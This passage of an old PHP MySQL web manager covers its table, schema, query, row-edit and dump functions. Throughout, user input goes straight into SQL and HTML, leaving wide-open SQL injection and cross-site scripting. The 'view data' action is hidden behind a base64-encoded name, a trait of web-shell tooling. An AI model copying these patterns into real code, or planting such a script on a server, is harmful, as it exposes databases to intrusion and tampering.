820 mysql_drop_db( $dbname, $mysqlHandle );
821 listDatabases();
822}
823
824function listTables() {
825 global $mysqlHandle, $dbname, $PHP_SELF;
826 echo "<h1>Tables List</h1>\n";
827 echo "<p class=location>$dbname</p>\n";
828 echoQueryResult();
829 echo "<form action='$PHP_SELF'>\n";
830 echo "<input type=hidden name=action value=createTable>\n";
831 echo "<input type=hidden name=dbname value=$dbname>\n";
832 echo "<input type=text name=tablename>\n";
833 echo "<input type=submit value='Create Table'>\n";
834 echo "</form>\n";
835 echo "<form action='$PHP_SELF'>\n";
836 echo "<input type=hidden name=action value=query>\n";
837 echo "<input type=hidden name=dbname value=$dbname>\n";
838 echo "<input type=text size=120 name=queryStr>\n";
839 echo "<input type=submit value='Query'>\n";
840 echo "</form>\n";
841 echo "<hr>\n";
842 $pTable = mysql_list_tables( $dbname );
843 if( $pTable == 0 ) {
844 $msg = mysql_error();
845 echo "<h3>Error : $msg</h3><p>\n";
846 return;
847 }
848 $num = mysql_num_rows( $pTable );
849 echo "<table cellspacing=1 cellpadding=5>\n";
850 for( $i = 0; $i < $num; $i++ ) {
851 $tablename = mysql_tablename( $pTable, $i );
852 echo "<tr>\n";
853 echo "<td>\n";
854 echo "$tablename\n";
855 echo "</td>\n";
856 echo "<td>\n";
857 echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
858 echo "</td>\n";
859 echo "<td>\n";
860 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
861 echo "</td>\n";
862 echo "<td>\n";
863 echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
864 echo "</td>\n";
865 echo "<td>\n";
866 echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
867 echo "</td>\n";
868 echo "</tr>\n";
869 }
870 echo "</table>";
871}
872
873function createTable() {
874
875 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
876 $queryStr = "CREATE TABLE $tablename ( no INT )";
877 mysql_select_db( $dbname, $mysqlHandle );
878 mysql_query( $queryStr, $mysqlHandle );
879 $errMsg = mysql_error();
880 listTables();
881}
882
883function dropTable() {
884 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
885 $queryStr = "DROP TABLE $tablename";
886 mysql_select_db( $dbname, $mysqlHandle );
887 mysql_query( $queryStr, $mysqlHandle );
888 $errMsg = mysql_error();
889 listTables();
890}
891
892function viewSchema() {
893 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
894 echo "<h1>Table Schema</h1>\n";
895 echo "<p class=location>$dbname > $tablename</p>\n";
896 echoQueryResult();
897 echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
898 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
899 echo "<hr>\n";
900 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
901 $num = mysql_num_rows( $pResult );
902 echo "<table cellspacing=1 cellpadding=5>\n";
903 echo "<tr>\n";
904 echo "<th>Field</th>\n";
905 echo "<th>Type</th>\n";
906 echo "<th>Null</th>\n";
907 echo "<th>Key</th>\n";
908 echo "<th>Default</th>\n";
909 echo "<th>Extra</th>\n";
910 echo "<th colspan=2>Action</th>\n";
911 echo "</tr>\n";
912
913 for( $i = 0; $i < $num; $i++ ) {
914 $field = mysql_fetch_array( $pResult );
915 echo "<tr>\n";
916 echo "<td>".$field["Field"]."</td>\n";
917 echo "<td>".$field["Type"]."</td>\n";
918 echo "<td>".$field["Null"]."</td>\n";
919 echo "<td>".$field["Key"]."</td>\n";
920 echo "<td>".$field["Default"]."</td>\n";
921 echo "<td>".$field["Extra"]."</td>\n";
922 $fieldname = $field["Field"];
923 echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
924 echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
925 echo "</tr>\n";
926 }
927 echo "</table>\n";
928}
929
930function manageField( $cmd ) {
931 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
932 if( $cmd == "add" )
933 echo "<h1>Add Field</h1>\n";
934 else if( $cmd == "edit" ) {
935 echo "<h1>Edit Field</h1>\n";
936 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
937 $num = mysql_num_rows( $pResult );
938 for( $i = 0; $i < $num; $i++ ) {
939 $field = mysql_fetch_array( $pResult );
940 if( $field["Field"] == $fieldname ) {
941 $fieldtype = $field["Type"];
942 $fieldkey = $field["Key"];
943 $fieldextra = $field["Extra"];
944 $fieldnull = $field["Null"];
945 $fielddefault = $field["Default"];
946 break;
947 }
948 }
949
950 $type = strtok( $fieldtype, " (,)\n" );
951 if( strpos( $fieldtype, "(" ) ) {
952 if( $type == "enum" | $type == "set" ) {
953 $valuelist = strtok( " ()\n" );
954 } else {
955 $M = strtok( " (,)\n" );
956 if( strpos( $fieldtype, "," ) )
957 $D = strtok( " (,)\n" );
958 }
959 }
960 }
961
962 echo "<p class=location>$dbname > $tablename</p>\n";
963 echo "<form action=$PHP_SELF>\n";
964 if( $cmd == "add" )
965 echo "<input type=hidden name=action value=addField_submit>\n";
966 else if( $cmd == "edit" ) {
967 echo "<input type=hidden name=action value=editField_submit>\n";
968 echo "<input type=hidden name=old_name value=$fieldname>\n";
969 }
970 echo "<input type=hidden name=dbname value=$dbname>\n";
971 echo "<input type=hidden name=tablename value=$tablename>\n";
972 echo "<h3>Name</h3>\n";
973 echo "<input type=text name=name value=$fieldname><p>\n";
974 echo '
975
976<h3>Type</h3>
977<font size=2 class="new">
978* `M\' indicates the maximum display size.<br>
979* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
980</font>
981<table>
982<tr>
983<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th>binary</th>
984</tr>
985<tr>
986<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
987<td align=center>O</td>
988<td> </td>
989<td align=center>O</td>
990<td align=center>O</td>
991<td> </td>
992</tr>
993<tr>
994<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
995<td align=center>O</td>
996<td> </td>
997<td align=center>O</td>
998<td align=center>O</td>
999<td> </td>
1000</tr>
1001<tr>
1002<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
1003<td align=center>O</td>
1004<td> </td>
1005<td align=center>O</td>
1006<td align=center>O</td>
1007<td> </td>
1008</tr>
1009<tr>
1010<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
1011<td align=center>O</td>
1012<td> </td>
1013<td align=center>O</td>
1014<td align=center>O</td>
1015<td> </td>
1016</tr>
1017<tr>
1018<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
1019<td align=center>O</td>
1020<td> </td>
1021<td align=center>O</td>
1022<td align=center>O</td>
1023<td> </td>
1024</tr>
1025<tr>
1026<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
1027<td align=center>O</td>
1028<td align=center>O</td>
1029<td> </td>
1030<td align=center>O</td>
1031<td> </td>
1032</tr>
1033<tr>
1034<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
1035<td align=center>O</td>
1036<td align=center>O</td>
1037<td> </td>
1038<td align=center>O</td>
1039<td> </td>
1040</tr>
1041<tr>
1042<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
1043<td align=center>O</td>
1044<td align=center>O</td>
1045<td> </td>
1046<td align=center>O</td>
1047<td> </td>
1048</tr>
1049<tr>
1050<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
1051<td> </td>
1052<td> </td>
1053<td> </td>
1054<td> </td>
1055<td> </td>
1056</tr>
1057<tr>
1058<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
1059<td> </td>
1060<td> </td>
1061<td> </td>
1062<td> </td>
1063<td> </td>
1064</tr>
1065<tr>
1066<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
1067<td align=center>O</td>
1068<td> </td>
1069<td> </td>
1070<td> </td>
1071<td> </td>
1072</tr>
1073<tr>
1074<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
1075<td> </td>
1076<td> </td>
1077<td> </td>
1078<td> </td>
1079<td> </td>
1080</tr>
1081<tr>
1082<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
1083<td> </td>
1084<td> </td>
1085<td> </td>
1086<td> </td>
1087<td> </td>
1088</tr>
1089<tr>
1090<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
1091<td align=center>O</td>
1092<td> </td>
1093<td> </td>
1094<td> </td>
1095<td align=center>O</td>
1096</tr>
1097<tr>
1098<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
1099<td align=center>O</td>
1100<td> </td>
1101<td> </td>
1102<td> </td>
1103<td align=center>O</td>
1104</tr>
1105<tr>
1106<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
1107<td> </td>
1108<td> </td>
1109<td> </td>
1110<td> </td>
1111<td> </td>
1112</tr>
1113<tr>
1114<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
1115<td> </td>
1116<td> </td>
1117<td> </td>
1118<td> </td>
1119<td> </td>
1120</tr>
1121<tr>
1122<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
1123<td> </td>
1124<td> </td>
1125<td> </td>
1126<td> </td>
1127<td> </td>
1128</tr>
1129<tr>
1130<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
1131<td> </td>
1132<td> </td>
1133<td> </td>
1134<td> </td>
1135<td> </td>
1136</tr>
1137<tr>
1138<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
1139<td> </td>
1140<td> </td>
1141<td> </td>
1142<td> </td>
1143<td> </td>
1144</tr>
1145<tr>
1146<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
1147<td> </td>
1148<td> </td>
1149<td> </td>
1150<td> </td>
1151<td> </td>
1152</tr>
1153<tr>
1154<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
1155<td> </td>
1156<td> </td>
1157<td> </td>
1158<td> </td>
1159<td> </td>
1160</tr>
1161<tr>
1162<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
1163<td> </td>
1164<td> </td>
1165<td> </td>
1166<td> </td>
1167<td> </td>
1168</tr>
1169<tr>
1170<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
1171<td colspan=5><center>value list</center></td>
1172</tr>
1173<tr>
1174<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
1175<td colspan=5><center>value list</center></td>
1176</tr>
1177</table>
1178<table>
1179<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
1180<tr>
1181<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
1182<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
1183<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
1184<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
1185<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" ) ) echo "checked";echo '></td>
1186<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
1187</tr>
1188</table>
1189<h3>Flags</h3>
1190<table>
1191<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
1192<tr>
1193<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
1194<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
1195<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
1196<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
1197</tr>
1198</table>
1199<p>';
1200 if( $cmd == "add" )
1201 echo "<input type=submit value='Add Field'>\n";
1202 else if( $cmd == "edit" )
1203 echo "<input type=submit value='Edit Field'>\n";
1204 echo "<input type=button value=Cancel onClick='history.back()'>\n";
1205 echo "</form>\n";
1206}
1207
1208function manageField_submit( $cmd ) {
1209 global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
1210 $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
1211 if( $cmd == "add" )
1212 $queryStr = "ALTER TABLE $tablename ADD $name ";
1213 else if( $cmd == "edit" )
1214 $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
1215 if( $M != "" )
1216 if( $D != "" )
1217 $queryStr .= "$type($M,$D) ";
1218 else
1219 $queryStr .= "$type($M) ";
1220 else if( $valuelist != "" ) {
1221 $valuelist = stripslashes( $valuelist );
1222 $queryStr .= "$type($valuelist) ";
1223 } else
1224 $queryStr .= "$type ";
1225 $queryStr .= "$unsigned $zerofill $binary ";
1226 if( $default_value != "" )
1227 $queryStr .= "DEFAULT '$default_value' ";
1228 $queryStr .= "$not_null $auto_increment";
1229 mysql_select_db( $dbname, $mysqlHandle );
1230 mysql_query( $queryStr, $mysqlHandle );
1231 $errMsg = mysql_error();
1232 // key change
1233 $keyChange = false;
1234 $result = mysql_query( "SHOW KEYS FROM $tablename" );
1235 $primary = "";
1236 while( $row = mysql_fetch_array($result) )
1237 if( $row["Key_name"] == "PRIMARY" ) {
1238 if( $row[Column_name] == $name )
1239 $keyChange = true;
1240 else
1241 $primary .= ", $row[Column_name]";
1242 }
1243 if( $primary_key == "PRIMARY KEY" ) {
1244 $primary .= ", $name";
1245 $keyChange = !$keyChange;
1246 }
1247 $primary = substr( $primary, 2 );
1248 if( $keyChange == true ) {
1249 $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
1250 mysql_query( $q );
1251 $queryStr .= "<br>\n" . $q;
1252 $errMsg .= "<br>\n" . mysql_error();
1253 $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
1254 mysql_query( $q );
1255 $queryStr .= "<br>\n" . $q;
1256 $errMsg .= "<br>\n" . mysql_error();
1257 }
1258 viewSchema();
1259}
1260
1261function dropField() {
1262 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1263 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
1264 mysql_select_db( $dbname, $mysqlHandle );
1265 mysql_query( $queryStr , $mysqlHandle );
1266 $errMsg = mysql_error();
1267 viewSchema();
1268}
1269
1270function viewData( $queryStr ) {
1271 global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
1272 echo "<h1>Data in Table</h1>\n";
1273 if( $tablename != "" )
1274 echo "<p class=location>$dbname > $tablename</p>\n";
1275 else
1276 echo "<p class=location>$dbname</p>\n";
1277 $queryStr = stripslashes( $queryStr );
1278 if( $queryStr == "" ) {
1279 $queryStr = "SELECT * FROM $tablename";
1280 if( $orderby != "" )
1281 $queryStr .= " ORDER BY $orderby";
1282 echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
1283 echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
1284 }
1285 $pResult = mysql_db_query( $dbname, $queryStr );
1286 $fieldt = mysql_fetch_field($pResult);
1287 $tablename = $fieldt->table;
1288 $errMsg = mysql_error();
1289 $GLOBALS[queryStr] = $queryStr;
1290 if( $pResult == false ) {
1291 echoQueryResult();
1292 return;
1293 }
1294 if( $pResult == 1 ) {
1295 $errMsg = "Success";
1296 echoQueryResult();
1297 return;
1298 }
1299 echo "<hr>\n";
1300 $row = mysql_num_rows( $pResult );
1301 $col = mysql_num_fields( $pResult );
1302 if( $row == 0 ) {
1303 echo "No Data Exist!";
1304 return;
1305 }
1306 if( $rowperpage == "" ) $rowperpage = 30;
1307 if( $page == "" ) $page = 0;
1308 else $page--;
1309 mysql_data_seek( $pResult, $page * $rowperpage );
1310 echo "<table cellspacing=1 cellpadding=2>\n";
1311 echo "<tr>\n";
1312 for( $i = 0; $i < $col; $i++ ) {
1313 $field = mysql_fetch_field( $pResult, $i );
1314 echo "<th>";
1315 if($action == "dmlld0RhdGE=")
1316 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
1317 else
1318 echo $field->name."\n";
1319 echo "</th>\n";
1320 }
1321 echo "<th colspan=2>Action</th>\n";
1322 echo "</tr>\n";
1323 for( $i = 0; $i < $rowperpage; $i++ ) {
1324 $rowArray = mysql_fetch_row( $pResult );
1325 if( $rowArray == false ) break;
1326 echo "<tr>\n";
1327 $key = "";
1328 for( $j = 0; $j < $col; $j++ ) {
1329 $data = $rowArray[$j];
1330 $field = mysql_fetch_field( $pResult, $j );
1331 if( $field->primary_key == 1 )
1332 $key .= "&" . $field->name . "=" . $data;
1333 if( strlen( $data ) > 30 )
1334 $data = substr( $data, 0, 30 ) . "...";
1335 $data = htmlspecialchars( $data );
1336 echo "<td>\n";
1337 echo "$data\n";
1338 echo "</td>\n";
1339 }
1340 if( $key == "" )
1341 echo "<td colspan=2>no Key</td>\n";
1342 else {
1343 echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
1344 echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
1345 }
1346 echo "</tr>\n";
1347 }
1348 echo "</table>\n";
1349 echo "<font size=2 class=\"new\">\n";
1350 if($action == "dmlld0RhdGE=")
1351 echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
1352 else
1353 echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
1354 echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
1355 echo "</font>\n";
1356 echo " | ";
1357 if( $page > 0 ) {
1358 if($action == "dmlld0RhdGE=")
1359 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
1360 else
1361 echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
1362 if( $orderby != "" && $action == "dmlld0RhdGE=")
1363 echo "&orderby=$orderby";
1364 echo "'>Prev</a>\n";
1365 } else
1366 echo "<font size=2 class=\"new\">Prev</font>";
1367 echo " | ";
1368 if( $page < ($row/$rowperpage)-1 ) {
1369 if($action == "dmlld0RhdGE=")
1370 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
1371 else
1372 echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
1373 if( $orderby != "" && $action == "dmlld0RhdGE=")
1374 echo "&orderby=$orderby";
1375 echo "'>Next</a>\n";
1376 } else
1377 echo "Next";
1378 echo " | ";
1379 if( $row > $rowperpage ) {
1380 echo "<input type=text size=4 name=page>\n";
1381 echo "<input type=submit value='Go'>\n";
1382 }
1383 echo "</form>\n";
1384 echo "</font>\n";
1385}
1386
1387function manageData( $cmd ) {
1388 global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
1389 if( $cmd == "add" )
1390 echo "<h1>Add Data</h1>\n";
1391 else if( $cmd == "edit" ) {
1392 echo "<h1>Edit Data</h1>\n";
1393 $pResult = mysql_list_fields( $dbname, $tablename );
1394 $num = mysql_num_fields( $pResult );
1395 $key = "";
1396 for( $i = 0; $i < $num; $i++ ) {
1397 $field = mysql_fetch_field( $pResult, $i );
1398 if( $field->primary_key == 1 )
1399 if( $field->numeric == 1 )
1400 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
1401 else
1402 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
1403 }
1404 $key = substr( $key, 0, strlen($key)-4 );
1405 mysql_select_db( $dbname, $mysqlHandle );
1406 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
1407 $data = mysql_fetch_array( $pResult );
1408 }
1409 echo "<p class=location>$dbname > $tablename</p>\n";
1410 echo "<form action='$PHP_SELF' method=post>\n";
1411 if( $cmd == "add" )
1412 echo "<input type=hidden name=action value=addData_submit>\n";
1413 else if( $cmd == "edit" )
1414 echo "<input type=hidden name=action value=editData_submit>\n";
1415 echo "<input type=hidden name=dbname value=$dbname>\n";
1416 echo "<input type=hidden name=tablename value=$tablename>\n";
1417 echo "<table cellspacing=1 cellpadding=2>\n";
1418 echo "<tr>\n";
1419 echo "<th>Name</th>\n";
1420 echo "<th>Type</th>\n";
1421 echo "<th>Function</th>\n";
1422 echo "<th>Data</th>\n";
1423 echo "</tr>\n";
1424 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
1425 $num = mysql_num_rows( $pResult );
1426 $pResultLen = mysql_list_fields( $dbname, $tablename );
1427 for( $i = 0; $i < $num; $i++ ) {
1428 $field = mysql_fetch_array( $pResult );
1429 $fieldname = $field["Field"];
1430 $fieldtype = $field["Type"];
1431 $len = mysql_field_len( $pResultLen, $i );
1432 echo "<tr>";
1433 echo "<td>$fieldname</td>";
1434 echo "<td>".$field["Type"]."</td>";
1435 echo "<td>\n";
1436 echo "<select name=${fieldname}_function>\n";
1437 echo "<option>\n";
1438 echo "<option>ASCII\n";
1439 echo "<option>CHAR\n";
1440 echo "<option>SOUNDEX\n";
1441 echo "<option>CURDATE\n";
1442 echo "<option>CURTIME\n";
1443 echo "<option>FROM_DAYS\n";
1444 echo "<option>FROM_UNIXTIME\n";
1445 echo "<option>NOW\n";
1446 echo "<option>PASSWORD\n";
1447 echo "<option>PERIOD_ADD\n";
1448 echo "<option>PERIOD_DIFF\n";
1449 echo "<option>TO_DAYS\n";
1450 echo "<option>USER\n";
1451 echo "<option>WEEKDAY\n";
1452 echo "<option>RAND\n";
1453 echo "</select>\n";
1454 echo "</td>\n";
1455 $value = htmlspecialchars($data[$i]);
1456 if( $cmd == "add" ) {
1457 $type = strtok( $fieldtype, " (,)\n" );
1458 if( $type == "enum" || $type == "set" ) {
1459 echo "<td>\n";
1460 if( $type == "enum" )
1461 echo "<select name=$fieldname>\n";
1462 else if( $type == "set" )
1463 echo "<select name=$fieldname size=4 multiple>\n";
1464 while( $str = strtok( "'" ) ) {
1465 echo "<option>$str\n";
1466 strtok( "'" );
1467 }
1468 echo "</select>\n";
1469 echo "</td>\n";
1470 } else {
1471 if( $len < 40 )
1472 echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
1473 else
1474 echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
1475 }
1476 } else if( $cmd == "edit" ) {
1477 $type = strtok( $fieldtype, " (,)\n" );
1478 if( $type == "enum" || $type == "set" ) {
1479 echo "<td>\n";
1480 if( $type == "enum" )
1481 echo "<select name=$fieldname>\n";
1482 else if( $type == "set" )
1483 echo "<select name=$fieldname size=4 multiple>\n";
1484 while( $str = strtok( "'" ) ) {
1485 if( $value == $str )
1486 echo "<option selected>$str\n";
1487 else
1488 echo "<option>$str\n";
1489 strtok( "'" );
1490 }
1491 echo "</select>\n";
1492 echo "</td>\n";
1493 } else {
1494 if( $len < 40 )
1495 echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
1496 else
1497 echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
1498 }
1499 }
1500 echo "</tr>";
1501 }
1502 echo "</table><p>\n";
1503 if( $cmd == "add" )
1504 echo "<input type=submit value='Add Data'>\n";
1505 else if( $cmd == "edit" )
1506 echo "<input type=submit value='Edit Data'>\n";
1507 echo "<input type=button value='Cancel' onClick='history.back()'>\n";
1508 echo "</form>\n";
1509}
1510
1511function manageData_submit( $cmd ) {
1512 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1513 $pResult = mysql_list_fields( $dbname, $tablename );
1514 $num = mysql_num_fields( $pResult );
1515 mysql_select_db( $dbname, $mysqlHandle );
1516 if( $cmd == "add" )
1517 $queryStr = "INSERT INTO $tablename VALUES (";
1518 else if( $cmd == "edit" )
1519 $queryStr = "REPLACE INTO $tablename VALUES (";
1520 for( $i = 0; $i < $num-1; $i++ ) {
1521 $field = mysql_fetch_field( $pResult );
1522 $func = $GLOBALS[$field->name."_function"];
1523 if( $func != "" )
1524 $queryStr .= " $func(";
1525 if( $field->numeric == 1 ) {
1526 $queryStr .= $GLOBALS[$field->name];
1527 if( $func != "" )
1528 $queryStr .= "),";
1529 else
1530 $queryStr .= ",";
1531 } else {
1532 $queryStr .= "'" . $GLOBALS[$field->name];
1533 if( $func != "" )
1534 $queryStr .= "'),";
1535 else
1536 $queryStr .= "',";
1537 }
1538 }
1539 $field = mysql_fetch_field( $pResult );
1540 if( $field->numeric == 1 )
1541 $queryStr .= $GLOBALS[$field->name] . ")";
1542 else
1543 $queryStr .= "'" . $GLOBALS[$field->name] . "')";
1544 mysql_query( $queryStr , $mysqlHandle );
1545 $errMsg = mysql_error();
1546 viewData( "" );
1547}
1548
1549function deleteData() {
1550 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1551 $pResult = mysql_list_fields( $dbname, $tablename );
1552 $num = mysql_num_fields( $pResult );
1553 $key = "";
1554 for( $i = 0; $i < $num; $i++ ) {
1555 $field = mysql_fetch_field( $pResult, $i );
1556 if( $field->primary_key == 1 )
1557 if( $field->numeric == 1 )
1558 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
1559 else
1560 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
1561 }
1562 $key = substr( $key, 0, strlen($key)-4 );
1563 mysql_select_db( $dbname, $mysqlHandle );
1564 $queryStr = "DELETE FROM $tablename WHERE $key";
1565 mysql_query( $queryStr, $mysqlHandle );
1566 $errMsg = mysql_error();
1567 viewData( "" );
1568}
1569
1570function fetch_table_dump_sql($table)
1571{
1572 global $mysqlHandle,$dbname;
1573 mysql_select_db( $dbname, $mysqlHandle );
1574 $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
1575 $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
1576 $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
1577 echo $tabledump;
1578 // get data
1579 $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
1580 $numfields=mysql_num_fields($rows);
1581 while ($row = mysql_fetch_array($rows, MYSQL_NUM))
1582 {
1583 $tabledump = "INSERT INTO $table VALUES(";
1584 $fieldcounter = -1;
1585 $firstfield = 1;
1586 // get each field's data
1587 while (++$fieldcounter < $numfields)
1588 {
1589 if (!$firstfield)
1590 {
1591 $tabledump .= ', ';
1592 }
1593 else
1594 {
1595 $firstfield = 0;
1596 }
1597 if (!isset($row["$fieldcounter"]))
1598 {
1599 $tabledump .= 'NULL';
1600 }
1601 else
1602 {
1603 $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
1604 }
1605 }
1606 $tabledump .= ");\n";
